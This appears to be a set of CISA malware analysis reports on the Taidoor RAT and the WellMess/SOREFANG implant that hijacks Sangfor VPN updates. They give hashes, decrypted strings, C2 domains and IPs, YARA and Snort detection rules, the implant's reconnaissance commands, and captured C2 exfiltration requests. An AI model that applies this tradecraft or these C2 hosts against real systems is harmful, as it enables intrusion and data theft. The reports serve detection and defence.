DuplicateHandle
GetCurrentProcess
DisconnectNamedPipe
TerminateProcess
PeekNamedPipe
ReadFile
CreateFileA
SetFileTime
OpenProcess
GetFileTime
WaitForSingleObject
WriteFile
DeleteFileA
GetCurrentProcessId
GetAdaptersInfo
advapi32.dll
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
OpenEventLogA
ReadEventLogA
CloseEventLog
RegDeleteValueA
RegCreateKeyExA
RegNotifyChangeKeyValue
Can’t open update file.
File too small.
SOFTWARE\Microsoft\Windows NT\CurrentVersion
RValue
SOFTWARE\Microsoft\Windows NT\CurrentVersion
RValue
%temp%\~lpz.zp
Can’t find plug file
Can’t find plug file
Can’t load more plug
Load Dll Plug Failed
%s\uaq*.dll
services.exe
Create File Failed
Create File Failed
rundll32.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion
RValue
RValue
%SystemRoot%\system32\cmd.exe
source
Micros
CmdPage
InfoPage
cmd.exe
source
Micros
avp.exe
shell process Terminated
ReadShellThread closed
Create result file failed
Create result file failed
CreateProcess Error: %d
CreateProcess Error: %d
CreateProcess succ
Open file Failed
File Size is 0
Open file Failed
Create File Failed
Create File Failed
no shell
services.exe
200
F::
200 OK
–End decrypted strings–

Screenshots

Figure 1 - Screenshot of the strings that are used as imports.

Figure 2 - Screenshot of the complex stream cipher padding the initial cipher value.

Figure 3 - Screenshot of the complex stream cipher compressing 2 bytes into 1 byte.

cnaweb.mrslove.com

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.publicdomainregistry.com with “mrslove.com”…

Domain Name: MRSLOVE.COM
Registry Domain ID: 70192241_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 2020-02-26T08:01:27Z
Creation Date: 2001-05-02T02:10:12Z
Registrar Registration Expiration Date: 2021-05-02T02:10:12Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Domain Status: OK https://icann.org/epp#OK
Registry Registrant ID: Not Available From Registry
Registrant Name: changeip operations
Registrant Organization: changeip.com
Registrant Street: 1200 brickell ave
Registrant City: miami
Registrant State/Province: florida
Registrant Postal Code: 33131
Registrant Country: US
Registrant Phone: +1.800791337
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: noc@changeip.com
Registry Admin ID: Not Available From Registry
Admin Name: changeip operations
Admin Organization: changeip.com
Admin Street: 1200 brickell ave
Admin City: miami
Admin State/Province: florida
Admin Postal Code: 33131
Admin Country: US
Admin Phone: +1.800791337
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: noc@changeip.com
Registry Tech ID: Not Available From Registry
Tech Name: changeip operations
Tech Organization: changeip.com
Tech Street: 1200 brickell ave
Tech City: miami
Tech State/Province: florida
Tech Postal Code: 33131
Tech Country: US
Tech Phone: +1.800791337
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: noc@changeip.com
Name Server: ns1.changeip.com
Name Server: ns2.changeip.com
Name Server: ns3.changeip.com
Name Server: ns4.changeip.com
Name Server: ns5.changeip.com
DNSSEC: Unsigned
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1.2013775952
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

Relationships
cnaweb.mrslove.com Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
Description

svchost.dll (8cf683b7d181591b91e145985f32664c) attempts to connect to the following domain.

210.68.69.82

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.apnic.net with “210.68.69.82”…

% Information related to ‘210.68.0.0 – 210.68.255.255’

% Abuse contact for ‘210.68.0.0 – 210.68.255.255’ is ‘hostmaster@twnic.net.tw’

inetnum:        210.68.0.0 – 210.68.255.255
netname:        SEEDNET
descr:         Digital United Inc.
descr:         9F, No. 125, Song Jiang Road
descr:         Taipei, Taiwan
country:        TW
admin-c:        JC256-AP
tech-c:         JC256-AP
mnt-by:         MAINT-TW-TWNIC
mnt-irt:        IRT-TWNIC-AP
status:         ALLOCATED PORTABLE
last-modified: 2018-12-12T06:04:02Z
source:         APNIC

irt:            IRT-TWNIC-AP
address:        Taipei, Taiwan, 100
e-mail:         hostmaster@twnic.net.tw
abuse-mailbox: hostmaster@twnic.net.tw
admin-c:        TWA2-AP
tech-c:         TWA2-AP
auth:         # Filtered
remarks:        Please note that TWNIC is not an ISP and is not empowered
remarks:        to investigate complaints of network abuse.
mnt-by:         MAINT-TW-TWNIC
last-modified: 2015-10-08T07:58:24Z
source:         APNIC

person:         Jonas Chou
nic-hdl:        JC256-AP
e-mail:         Jonaschou@fareastone.com.tw
address:        2F, No.218, Rueiguang Road
address:        Taipei, 114, R.O.C
phone:         +886-2-7700-8888
fax-no:         +886-2-7700-8888
country:        TW
mnt-by:         MAINT-TW-TWNIC
last-modified: 2012-12-18T10:10:01Z
source:         APNIC

% Information related to ‘210.68.69.80 – 210.68.69.87’

inetnum:        210.68.69.80 – 210.68.69.87
netname:        42888423-TW
descr:         Taipei Taiwan
country:        TW
admin-c:        NN3251-TW
tech-c:         NN3251-TW
mnt-by:         MAINT-TW-TWNIC
remarks:        This information has been partially mirrored by APNIC from
remarks:        TWNIC. To obtain more specific information, please use the
remarks:        TWNIC whois server at whois.twnic.net.
changed:        DavidLin1@fareastone.com.tw 20180330
status:         ASSIGNED NON-PORTABLE
source:         TWNIC

person:         NULL
address:        N/A Taiwan
country:        TW
e-mail:         joy25488@gmail.com
nic-hdl:        NN3251-TW
changed:        hostmaster@twnic.net.tw 20180331
source:         TWNIC

% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-US4)

Relationships
210.68.69.82 Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
Description

svchost.dll (8cf683b7d181591b91e145985f32664c) attempts to connect to the following IP address.

6e6d3a831c03b09d9e4a54859329fbfd428083f8f5bc5f27abbfdd9c47ec0e57

Tags

loader

Details
Name rasautoex.dll
Size 50176 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 4ec8e16d426a4aaa57c454c58f447c1e
SHA1 5c89629e5873072a9ca3956b67cf7b5080312c80
SHA256 6e6d3a831c03b09d9e4a54859329fbfd428083f8f5bc5f27abbfdd9c47ec0e57
SHA512 284e0dff33f4ffb6d55f2fdb1de81d5644fb2671aa358dfb72b34a50632f708b7b071202202efec0b48bc0f622c6947f8ccf0818ebaff7277eda854cee67eeaa
ssdeep 768:DN5oCkAI3effi5djegTXLzAl78S3ge0eYUi3EaQkDdXptOKeosAmMotwEX1:DN5oCk1eyTXn+qXUi3pptJMwE
Entropy 5.681253
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-01-04 02:11:55-05:00
Import Hash 956b48719c7be61f48572c8fa464e00c
PE Sections
MD5 Name Raw Size Entropy
a9b389fc8171131551c6570d2395de57 header 1024 2.619293
8dabe7bfc2ee6b9819f554b2694c98eb .text 26624 6.217867
8e63e6b885c3d270ccfb7607b9662601 .rdata 14848 4.618383
d44f2a519c2649244a8c87581872b483 .data 4096 2.280898
0aa4114597794059e1d4a2c246c7d7a5 .pdata 2048 4.331432
7197f896bddfd6e434b1d5703bf0c5a2 .rsrc 512 5.097979
54bb45b94c64d3717b1be8194fb4a6a7 .reloc 1024 3.689756
Description

This file is a 64-bit Windows DLL file. The file “rasautoex.dll” is a Taidoor loader and will decrypt and execute the 64-bit version of Taidoor “svchost.dll” (6627918d989bd7d15ef0724362b67edd) in memory.

0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686

Tags

remote-access-trojan

Details
Name svchost.dll
Size 183808 bytes
Type data
MD5 6627918d989bd7d15ef0724362b67edd
SHA1 21e29034538bb4e3bc922149ef4312b90b6b4ea3
SHA256 0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686
SHA512 83ee751b15d8fd8477b8ecf8d33a4faf30b75aceb90c0e58ebf9dbbfc1d354f7e772f126b8462fd5897a4015a6f5e324d34900ff7319e8cc791fb239ca603ddc
ssdeep 3072:7PR4kaQOrd41zdruwiAyr/Ta1XxKH3zVrWvcfWslmOLdXFKY8SIMjUPpF5:3aQLgwiAyr/TiXxMsvcrxbnjUPP5
Entropy 7.999011
Antivirus

No matches found.

YARA Rules
  • rule CISA_10292089_01 : rat loader TAIDOOR
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10292089"
           Date = "2020-06-18"
           Last_Modified = "20200616_1530"
           Actor = "n/a"
           Category = "Trojan Loader Rat"
           Family = "TAIDOOR"
           Description = "Detects Taidoor Rat Loader samples"
           MD5_1 = "8cf683b7d181591b91e145985f32664c"
           SHA256_1 = "363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90"
           MD5_2 = "6627918d989bd7d15ef0724362b67edd"
           SHA256_2 = "0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686"
       strings:
           $s0 = { 8A 46 01 88 86 00 01 00 00 8A 46 03 88 86 01 01 00 00 8A 46 05 88 86 02 01 00 00 8A 46 07 88 86 03 01 00 00 }
           $s1 = { 88 04 30 40 3D 00 01 00 00 7C F5 }
           $s2 = { 0F BE 04 31 0F BE 4C 31 01 2B C3 2B CB C1 E0 04 0B C1 }
           $s3 = { 8A 43 01 48 8B 6C 24 60 88 83 00 01 00 00 8A 43 03 }
           $s4 = { 88 83 01 01 00 00 8A 43 05 88 83 02 01 00 00 8A 43 07 88 83 03 01 00 00 }
           $s5 = { 41 0F BE 14 7C 83 C2 80 41 0F BE 44 7C 01 83 C0 80 C1 E2 04 0B D0 }
           $s6 = { 5A 05 B2 CB E7 45 9D C2 1D 60 F0 4C 04 01 43 85 3B F9 8B 7E }
       condition:
           ($s0 and $s1 and $s2) or ($s3 and $s4 and $s5) or ($s6)
    }
ssdeep Matches

No matches found.

Description

This encrypted file has been identified as the Taidoor RAT loaded by “rasautoex.dll” (4ec8e16d426a4aaa57c454c58f447c1e). This file contains the same functionality and encryption keys as the 32-bit version “svchost.dll” (8CF683B7D181591B91E145985F32664C).

This file calls out to a different C2. This C2 was also observed in memory of the infected system provided for analysis.

–Begin C2–
infonew.dubya.net
–End C2–

The malware author did not remove the symbol file path from "rasautoex.dll", as was done with the 32-bit version. This artifact provides some additional insight into what the author intended this binary to do: "MemLoad(pass symantec)".

–Begin symbol file artifact–
C:UsersuserDesktopMemLoad(pass symantec)versionx64ReleaseMemoryLoad.pdb
–End symbol file artifact–

Relationship Summary

4a0688baf9… Used 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
363ea096a3… Used_By 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4
363ea096a3… Connected_To cnaweb.mrslove.com
363ea096a3… Connected_To 210.68.69.82
cnaweb.mrslove.com Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
210.68.69.82 Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90

Mitigation

alert tcp 210.68.69.82 any <> $HOME_NET any (msg:"Malicious traffic"; sid:#########; rev:1; classtype:tcp-event;)

alert tcp 156.238.3.162 any <> $HOME_NET any (msg:"Malicious traffic"; sid:#########; rev:1; classtype:tcp-event;)

alert udp any 53 <> $HOME_NET any (msg:"Attempt to connect to malicious domain"; content:"www.infonew.dubya.net"; sid:#########; rev:1;)

alert udp any 53 <> $HOME_NET any (msg:"Attempt to connect to malicious domain"; content:"www.cnaweb.mrslove.com"; sid:#########; rev:1;)
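The domain rules above match the dotted hostname as a literal string. On the wire, a DNS query carries the name as length-prefixed labels (the dots are replaced by length bytes), so a literal "www.infonew.dubya.net" content match fires on proxy logs or HTTP traffic but not on the UDP/53 query itself. The following added example (not part of the CISA report or its rule set) encodes the C2 hostnames listed in this report as wire-format names, renders them as Snort |hex| content matches, and shows the difference against a constructed query packet. The sid placeholder and the helper names are assumptions.

```python
import struct

# C2 hostnames from the report (the Taidoor samples); constructed test traffic below.
C2_DOMAINS = ["infonew.dubya.net", "cnaweb.mrslove.com"]


def dns_name_wire(domain: str) -> bytes:
    """Encode a hostname as a DNS wire-format name: length-prefixed labels, NUL root.
    Labels are lower-cased because DNS names are case-insensitive (pair with nocase)."""
    out = b""
    for label in domain.rstrip(".").lower().split("."):
        if not 0 < len(label) <= 63:
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def snort_content(domain: str) -> str:
    """Render the wire-format name as a Snort/Suricata content option with |hex| escapes."""
    parts = [f"|{len(l):02X}|{l}" for l in domain.rstrip(".").lower().split(".")]
    return 'content:"' + "".join(parts) + '|00|"; nocase;'


def snort_rule(domain: str) -> str:
    """Full rule text; SID_PLACEHOLDER is an assumption to be replaced by the deploying team."""
    return (f"alert udp $HOME_NET any -> any 53 "
            f'(msg:"DNS query for {domain}"; {snort_content(domain)} '
            f"sid:SID_PLACEHOLDER; rev:1;)")


def dns_query(domain: str, txid: int = 0x1234) -> bytes:
    """Build a minimal standard A query (constructed sample packet, no real traffic)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # id, flags(RD), qd=1
    return header + dns_name_wire(domain) + struct.pack(">HH", 1, 1)  # QTYPE A, QCLASS IN


def literal_matches(packet: bytes, domain: str) -> bool:
    """What the report's rules test: the dotted string as raw bytes."""
    return domain.encode("ascii") in packet


def wire_matches(packet: bytes, domain: str) -> bool:
    """What a query-side rule must test: the label-encoded name."""
    return dns_name_wire(domain) in packet


if __name__ == "__main__":
    for d in C2_DOMAINS:
        pkt = dns_query(d)
        print(snort_rule(d))
        print(f"  literal match: {literal_matches(pkt, d)}  wire match: {wire_matches(pkt, d)}")
```

The generated rule matches outbound queries from $HOME_NET; a resolver-side or response-side variant only changes the header, not the content bytes.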

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 3, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: July 16, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA). This malware has been identified as SOREFANG. Advanced persistent threat (APT) groups have been identified using this malware. For more information regarding this malware, please visit: https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development

This report analyzes three unique files. The files are Trojan implants designed to exploit Sangfor Secure Sockets Layer (SSL) virtual private network (VPN) servers. The malware replaces the Sangfor VPN software distributed to VPN clients. When installed, the implants provide the remote operator total control over the infected systems.

For a downloadable copy of IOCs, see MAR-10296782-1.v1.stix.

Submitted Files (3)

58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 (58d8e65976b53b77645c248bfa18c3…)

65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 (65495d173e305625696051944a36a0…)

a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 (a4b790ddffb3d2e6691dcacae08fb0…)

IPs (2)

103.216.221.19

192.168.169.103

Findings

65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75

Tags

spyware trojan

Details
Name 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
Size 437760 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c5d5cb99291fa4b2a68b5ea3ff9d9f9a
SHA1 a1b5d50fe87f9c69a0e4da447f8d56155ce59e47
SHA256 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
SHA512 1f8e1ad6e910bdf3b251ffbb81b115233eb15be725d420139ba2af4f82009a655856e39bcb4d111b7bd1f135025f73d3eab1f32d1469f067966e82d14c5a0d3e
ssdeep 6144:ifY8W87LY6I0sl/myJy3FkwTCIoo4ECxAO7BjqxNuC:iAV+sl/mey3FnChxCuC
Entropy 6.205690
Antivirus
Ahnlab Malware/Win32.Generic
Antiy Trojan/Win32.Wacatac
Cyren W32/Trojan.ZYGO-1305
ESET a variant of Win32/Spy.Agent.PXZ trojan
Ikarus Trojan-Spy.Agent
K7 Spyware ( 0056414e1 )
Quick Heal Trojan.Agentb
TrendMicro TrojanS.6BD050DD
TrendMicro House Call TrojanS.6BD050DD
VirusBlokAda Trojan.Agentb
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = "CISA Code & Media Analysis"
        Date = "2020-07-06"
        Last_Modified = "20200706_1017"
        Actor = "n/a"
        Category = "Trojan"
        Family = "WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-28 07:37:41-04:00
Import Hash de67eebbdb41eb69bfdf6c23a6479582
Company Name Sangfor Technologies Co.,Ltd
File Description SangforUD
Internal Name SangforUD.exe
Legal Copyright Copyright (C) 2015
Original Filename SangforUD.EXE
Product Name SangforUD application
Product Version 7.6.0.100
PE Sections
MD5 Name Raw Size Entropy
79b491fc5059891654fc228b26171f6d header 1024 3.067812
471b9d4a35e5f8b569ae1ca6bc91aba1 .text 240128 6.589660
d74b8d761debb3939c3878052199ffa2 .rdata 74240 5.586653
463a4a2ba2e9496201b711302c4e3008 .data 5120 3.612142
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
e9edb21c8ad50896cd623d0172835e6d .rsrc 103936 3.885868
1d7b5cd8dcec22299f23bb463562815a .reloc 12800 6.559632
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
65495d173e… Connected_To 103.216.221.19
Description

This application is a malicious 32-bit Windows executable. The executable exploits a vulnerability identified within Sangfor SSL VPN devices. The vulnerability can be leveraged to gain control over systems because the VPN clients do not properly verify the integrity of software updates. The malware exploits this vulnerability by replacing software update binaries on compromised VPN servers. The malicious binaries are then delivered and executed on the VPN clients reporting to the infected VPN server.

During runtime, the malware immediately attempts to clear all files from the directories “\Sangfor\SSL\Log\” and “\Sangfor\SSL\Dump\”.

The malware then attempts to install itself as the file "\Sangfor\SSL\SanforUPD.exe". Presumably this makes the binary the first update executable served as an application update to targeted Sangfor VPN clients.

Next, it checks for the presence of a file named “\Sangfor\SSL\.SangforUD.sum”. If this file is not present, the malware will collect information from the infected system, using the following commands:

—Begin Information Collection Commands—
systeminfo.exe
ipconfig.exe /all
cmd.exe /c set
net.exe user
HOSTNAME.EXE
net.exe user /domain
net.exe group /domain
tasklist.exe /V
whoami.exe /all
—End Information Collection Commands—

It will also enumerate folders on disk. The collected system information and the result of the file enumerations are stored in a buffer in system memory. The malware collected the following information during analysis:

—Begin Information Collected—
User information (user name and SID)
Group information (Group name, type, SID, and attributes)
Privileges information (Privilege name, description, state (disabled, enabled, N/A))
—End Information Collected—

This data will next be encrypted, encoded, and then transmitted to the command and control (C2) server Internet Protocol (IP) address 103.216.221.19.

The data sent to the C2 server is encrypted with the Rivest cipher 6 (RC6) algorithm. The key used to encrypt the outbound data is generated dynamically for each C2 session and is appended to the outbound data so the remote operator can decrypt it: it is carried in the "filename" field of the outbound request. In the following partial transmission, for example, the RC6 key d4908a2e47ff25c44054f8e623426243 can be used to decrypt the C2 data.

—Begin Partial C2 Transmission—
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----974767299852498929531610575
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Host: 103.216.221.19
Content-Length: 38886
Cache-Control: no-cache

------974767299852498929531610575
Content-Disposition: form-data; name="_ga"; filename="d4908a2e47ff25c44054f8e623426243"
Content-Type: application/octet-stream

cktTaQTE2ed BUVZaeg tMkXS 5YrSj6zdDKXYl2v LQCi85ZruMOUmkSLpc0f Tychyjhpo9fJHt5EIQw, ZREaS. 3s4al2OGFMBkiqrDsN, EMfzzmDWPGoATf, oM3n kvApOjc85g1jx qACIwvhAC3lz3jTb3p6D, YI2gZ63Wpob9Bm88 gZIqfg6h. ohjr ecwax41ACb9Bm8khPfh hO0Aku, VqtXhmDmOTUen 019HaS6Wmy639Km ttKwx62W2EIw. vhAC3kKL, zp3Gg CQdqXRmDmOTWe1n0IZD, EEVytbV4Zg5jk1Hp9Nf, R2kuvB06xoA. kHazjW0VlmP7J KUxnye
—End Partial C2 Transmission—

The encrypted C2 traffic is encoded with a slightly modified Base64 algorithm. The encoded data matches standard Base64 output except that spaces (0x20) are inserted between parts of the data. An example is illustrated below, where the first 32 bytes of the outbound data were replaced with the ASCII byte "x" (0x78).

—Begin Base64 Modification—
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----974767299852498929531610575
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Host: 103.216.221.19
Content-Length: 24307
Cache-Control: no-cache

------974767299852498929531610575
Content-Disposition: form-data; name="_ga"; filename="7e061a180fa24eb5a318d6eae8797cc2"
Content-Type: application/octet-stream

eHh4eH h4eHh4eHh4eHh4eHh4eH h4eHh4eH h4eHh4eHhB6e, RwoJe. cqpDFRSyMwBqaG4 INaFZG9zm2 A7siND60oM4QhhCrf oAiAvC OUMq3, W1ZlPGq kKhkRkwjNYu1dc6. bUmU8ashTA Q8KSyp2xCnA m3A24PU 6KLQqzPsMiMmEZ9A, EQF4. Ryhld1t WZTxqZCoZEZMKzA6gq TaENSD6e6Izy9Caj6 W3Z9jNkB1 7tQpuEnU266hhaEc 4WwEPCkssdCs4GF. MoVXhKQHl6C aj4t8u6I ueaakH1 60jPL 0JqH1 bdn2M. 2QHWcgYUyhVeEqhj6I Pu6ANJXvs, zSvNsUXthp5NIDV0i
—End Base64 Modification—

As illustrated, it appears exactly like the Base64 output of encoding the ASCII bytes “x” with the exception of the periodic spaces within the encoded data.
